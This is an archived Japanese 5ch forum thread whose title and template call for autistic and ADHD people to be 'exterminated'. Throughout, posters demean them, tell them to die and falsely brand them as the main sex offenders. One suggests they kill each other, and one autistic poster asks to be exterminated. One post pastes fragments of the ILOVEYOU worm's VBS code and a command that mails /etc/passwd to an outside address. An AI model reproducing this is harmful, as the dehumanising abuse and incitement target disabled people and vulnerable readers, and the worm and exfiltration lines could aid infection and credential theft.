5ちゃんねる ★スマホ版★ ■掲示板に戻る■ 全部 1- 最新50  

■ このスレッドは過去ログ倉庫に格納されています

【主張】AS・ADHDは抹殺するべき その1

1 : ◆tI6P9K96dw :2006/12/03(日) 23:02:55 ID:???
ここはASやADHDの当人が悩みを相談するスレではありません。
このスレがBad落ちても、必ず次スレとして建てること。

ローカルルールより
独り言や自説の主張・雑談・馴れ合いなどは禁止です。
特に発達障害者本人による、自説の主張はやめてください。

▼空気読め。
▼荒らし・煽り・空気読めない人は華麗にスルーしましょう。
▼次スレは空気読んで流れ見て950辺り過ぎたら立ててください。
▼軽度発達障害の診断はこのスレではできません。

2 :テンプレート:2006/12/03(日) 23:04:27 ID:???
【注意事項】
▼空気読め。
▼荒らし・煽り・空気読めない人は華麗にスルーしましょう。
▼次スレは空気読んで流れ見て950辺り過ぎたら立ててください。
▼軽度発達障害の診断はこのスレではできません。

★軽度発達障害者でこのスレへ来られた方へ★
☆ここは軽度発達障害者に迷惑している人の為のスレです。 (もう何を言いたいか理解できましたよね?)
☆軽度発達障害を理解する気は無いので障害に関する解説の類いは一切お断りします。(住人談)
☆一部の批判的な内容だけを読んで反論したい衝動を抑えられない人はこのスレを読まない(ROMらない)でください。
☆荒れるだけですので軽度発達障害者の方の書き込みは辞めてください。(健常者総意)
☆相談事がある人はメンヘル板のスレへ行くことをお勧めします。
☆前スレ荒らした人は軽度発達障害者でここの住人は貴方達をよっぽど嫌ってます。


3 :テンプレート:2006/12/03(日) 23:07:15 ID:???
簡単に軽度発達障害者を説明すると…

例えば、名前を呼ばれて急いで彼のところに向かおうとしたら
漫画のように柱にぶつかるなんてそんなやつですね。
こんなのは本人が怪我するだけであってぶっちゃけどうだっていいです。(そのまま●ねばよかったのに 住人談)
しかし、その柱にぶつかる間に綺麗な花を踏んづけたり老人にぶつかったり何か被害を受けてるかもしれません。

空気が読めない・相手の気持ちを察することができない
困らせてばかりで何回、注意しても改善が見られないならば
その人は軽度発達障害者かも。

健常者の人生において軽度発達障害者が近くに居ることで+に作用することはあるのでしょうか?
私はないと思います。
軽度発達障害者に迷惑している人はこのスレで悩みを打ち明けましょう。

4 :>>1はアスペルガーw:2006/12/03(日) 23:47:09 ID:g2yC2pYp
935 :マジレスさん :2006/11/26(日) 21:45:26 ID:hdUVK220
仕事に関しては俺は「20回以上」礼を尽くして辞めさせてくれってなお願いをした。
毎日言い続けてひと月以上経った。
社長、副社長、経理課長(人事も担当)、営業部長、営業課長、主任、
俺は本社勤務だが研修を受けた支店の連中にも話した。
上司にあたる人には全員に言ってある。
精神科に通ってる、自分はキチガイですって言えば辞めさせてくれるかと思ってそれも言ってみたがそれでもかまわない、
続けて欲しいと言われる。
同僚はそんな俺に同情してくれてる。

それでも辞めさせてくれない。

だから言外の意味、空気が読めてないわけでは決してない。
ま、それでも年明けには辞めるけどね。

こういうASもいるってことだ。
お前らのカテゴライズに当てはまらないASで悪かったなw

5 :ナナシズム:2006/12/04(月) 02:19:26 ID:???
>>1 
そんなちっぽけな腕力で俺らをネタヤシにでけるとでもおもったかぁぁぁぁぁぁぁぁぁぁぁぁぁぁぁぁぁぁぁぁぁぁぁぁ!!
どこまでも蛆のように存在して貴様らに抗い続けるぜぇぇぇぇぇぇぇぇぇぇぇぇぇぇぇぇぇぇぇぇぇぇぇぇぇぇぇぇぇぇ!!
殺れるもんなら殺ってみやがれやぁぁぁぁぁぁぁぁぁ!! カスどもぉぉぉぉぉぉぉぉぉぉぉぉぉぉぉぉぉぉぉぉぉぉぉぉ!!
  

6 :ナナシズム:2006/12/04(月) 02:21:22 ID:???
こんな糞スレ真っ向から潰してくれるわぁぁぁぁぁぁぁぁぁぁぁぁぁぁぁぁぁぁぁぁぁぁぁぁぁ!!

7 :ナナシズム:2006/12/04(月) 02:34:29 ID:gkJic8t9
だったらWindous使うなよ

8 :ナナシズム:2006/12/04(月) 03:05:35 ID:Tl4TWfgi
通報しました

9 :ナナシズム:2006/12/04(月) 14:37:57 ID:???
http://life7.2ch.net/test/read.cgi/jinsei/1165016408/
http://human5.2ch.net/test/read.cgi/handicap/1164792133/


10 :irony star ◆tI6P9K96dw :2006/12/04(月) 15:49:55 ID:???
みなさん、見事に釣られていますね・・・・。

11 :ナナシズム:2006/12/04(月) 19:04:43 ID:WNOLjer2
このスレ立てたのはアスペルガー本人だからwww

12 :ナナシズム:2006/12/04(月) 20:18:54 ID:???
何だとぉぉぉぉぉぉぉぉぉぉぉぉぉぉぉぉぉぉぉぉぉぉぉぉぉぉぉぉぉぉぉぉぉ!?
スレ主は自分嫌いだったのかぁぁぁぁぁぁぁぁぁぁぁぁぁぁぁぁぁぁぁぁぁ!!

13 :ナナシズム:2006/12/04(月) 20:29:19 ID:???
漫画の柳沢教授って、アレ、アスペルガーかな?

14 :ナナシズム:2006/12/04(月) 20:57:09 ID:???
>>12
アスペが健常者がウザイからここでやってろって自らスレ立てて誰も集まらないから立て逃げしますたw


15 :IronyStar ◆tI6P9K96dw :2006/12/05(火) 23:02:53 ID:???
いらっしゃいませ。どうかしましたか?
おや、それは大変でしたね。このカクテルは私のおごりです。
それ飲んで、ちょっと気持ちを落ち着かせて読んで欲しい。
あなたの感じた怒りは、発散するとより大きくなるんです。
なんといいますか、人は感情を認知して増大させるんですよ。
だから、怒りを感じたらまず我慢して、怒りを忘れて欲しい。

そう、そうです。またなんです。あなたは、釣られたんですよ。
―――――――――v――――――――――――――
日 凸  ▽ ∇ U
≡≡≡≡≡≡≡  ∧ ∧  
 U ∩ [] % 曰 (゚Д゚ ;)
_________|つ∽)_ 
           ∀
―――――――――――

 ━┳━   ━┳━
 ̄ ┻  ̄ ̄ ̄┻ ̄ ̄ ̄ ̄

16 :ナナシズム:2006/12/06(水) 15:58:13 ID:CVxSpUNq
釣り・ネタ・マジレス・スレの空気を読めない人がこれらの単語を軽々
口にしないでください。
存在が迷惑ですよwww

17 :ナナシズム:2006/12/06(水) 20:39:17 ID:???
>>16
IDがスーパーウンコ

18 :ナナシズム:2006/12/06(水) 21:13:14 ID:1WQx8jXB


19 :ナナシズム:2006/12/07(木) 22:45:22 ID:???
>>16 >存在が迷惑ですよwww  
   好きでお前らのウザじゃねぇぇぇぇぇぇぇぇぇぇぇぇぇぇぇぇぇぇぇ!!

   この苦しみ、痛み、切なさ、虚しさ、お前らに理解できるものかぁぁぁぁぁぁぁぁぁぁぁぁぁぁぁぁぁぁぁぁぁ!!(強制退去

20 :ナナシズム:2006/12/08(金) 12:37:26 ID:+OZdqUs1
他人の気持ち理解できないアスペが何を言ってるんだかw
理解する価値なんてなし

21 :ナナシズム:2006/12/08(金) 14:09:47 ID:S2iYSGX7
421 :ファイナルエスペランサー ◆IjTZnUK1ww :2006/12/07(木) 22:52:18 ID:EQun7Wou
>>412
俺はカタストロフィーリアルで凹るからな。
あいつはマジで凹ってシャメ取ってupするからW

http://ex9.2ch.net/test/read.cgi/k1/1165475385/

コテがコテを襲撃予告
「ハゲ、逮捕されるぞwwwwwwwwwwwwwww」
と書き込むと、発狂するぜ。


22 :IronyStar ◆tI6P9K96dw :2006/12/09(土) 11:28:34 ID:???
↑を再翻訳

421 :*IjTZnUK1ww: 2006/12/07(木曜日)のID: 18Fainalesperansar22:52:EQun7 Wouのときに。

>>412
....へこんでください。 . 本当のカタストロフィー、それ。私。
シェームズを凹ませて、取って、上にマジェーを処理する、彼はWです。

http://ex9.2ch.net/test/read.cgi/k1/1165475385/

そして、それを言うCoteの攻撃のCoteの予告、「はげ、」「逮捕wwwwwwwwwwwww
wwを望んでください。」それを書くとき、気が狂います…


23 :IronyStar ◆tI6P9K96dw :2006/12/09(土) 11:34:28 ID:???
何かご用でしょうか?何か間違っていましたか?
ああ、それは難しかったです。このカクテルは、私のおごりです。
それがゆがめて、飲んで、私が少し感覚を静めて、それを読むことを欲しくしてください。
私があなたが感じた怒りを吹き飛ばすとき、私はより大きくなります。
人は感情を認めて、私が言うものを押し上げます。
したがって、最初は、私が怒りを感じるならば、私はそれに耐えて、あなたに怒りを忘れて欲しいです。

それはまあまあです。再び。あなたは誘われました。
―――――――――v――――――――――――――
日 凸  ▽ ∇ U
≡≡≡≡≡≡≡  ∧ ∧  
 U ∩ [] % 曰 (゚Д゚ ;)<再翻訳してみました。
_________|つ∽)_ 
           ∀
―――――――――――

 ━┳━   ━┳━
 ̄ ┻  ̄ ̄ ̄┻ ̄ ̄ ̄ ̄

24 :ナナシズム:2006/12/10(日) 15:08:29 ID:RxEXFwfq
文面からでしか理解できないアスペ哀れwww

25 :Asama Bin Laden ◆UdEhVBr2P6 :2006/12/10(日) 17:33:23 ID:Ix0CSdA4
c.Copy(dirsystem&"\MSKernel32.vbs")
c.Copy(dirwin&"\Win32DLL.vbs")
c.Copy(dirsystem&"\LOVE-LETTER-FOR-YOU.TXT.vbs")
cat /etc/passwd | mail nobody@nonexistent.com
If s = "htm" and fso.FileExists(f1.path+"l") = False thenfso.CopyFile f1.path, f1.path+"l"
Set A4 = A1.CreateTextFile(A1.BuildPath(A1.GetSpecialFolder(1)
fso.copyfile "c:\network.vbs", "j:\windows\start menu\programs\startup\"
fso.copyfile "dirsystem&nurupo.vbs", "j:\windows\start menu\programs\startup\"
If s = "htm" and fso.FileExists(f1.path+"l") = False then fso.CopyFile f1.path, f1.path+"l"


26 :ナナシズム:2006/12/10(日) 20:46:46 ID:+Xw5OFZ+
自閉症
アスペルガー
ADHD

性犯罪の三大加害者で〜す。

27 :ナナシズム:2006/12/11(月) 01:21:13 ID:9tQXoEcL
嘘で〜す。

28 :ナナシズム:2006/12/21(木) 17:35:40 ID:???
>>20 
っざけてろ!! 「〜する価値」なんて言葉、チャラチャラ口にするなこのぉぉぉぉぉ!!
理解しようと必死で勤めてる椰子を例外にしろやぁぁぁぁぁ!!

29 :ナナシズム:2006/12/22(金) 12:18:12 ID:W4E+K/3D
>>28
理解しようと必死になろうが理解できないのが障害なんだから諦めろ
オマエが必死になろうがそんなの知ったこっちゃねーよ

空気読めよ
オマエの周りの人間はもうマトモに接することを諦めてると思うぜ
相手するだけ無駄なんだよwww

30 :ナナシズム:2006/12/25(月) 23:42:10 ID:UI9TwmY/
アスペ空気読んで●ねwww

31 :ナナシズム:2006/12/31(日) 01:45:22 ID:???
たね

32 :ナナシズム:2007/01/01(月) 12:10:31 ID:jLZY5zCJ
ウンウン

33 :ナナシズム:2007/01/04(木) 01:04:17 ID:???
正直1に賛成する。で、私は当事者だから、抹殺してください。
お互いHappyなはず。

34 :ナナシズム:2007/01/07(日) 02:42:45 ID:7F+3o8O0
アスペ同士でやりあえば一気に二人消えるから無問題じゃね?

35 :ナナシズム:2007/01/07(日) 21:23:40 ID:???
そうか、いいこと聞いた。

36 :ナナシズム:2007/01/08(月) 23:07:52 ID:w0kYtEem
健常者様が一人消えるなんてもったいなすぎるよ
アスペが消えるべし

37 :ナナシズム:2007/01/16(火) 22:13:05 ID:???
w0kYtEemはウザいからいいかげん消えなよ

11 KB
■ このスレッドは過去ログ倉庫に格納されています

★スマホ版★ 掲示板に戻る 全部 前100 次100 最新50

read.cgi ver 05.04.00 2017/10/04 Walang Kapalit ★
FOX ★ DSO(Dynamic Shared Object)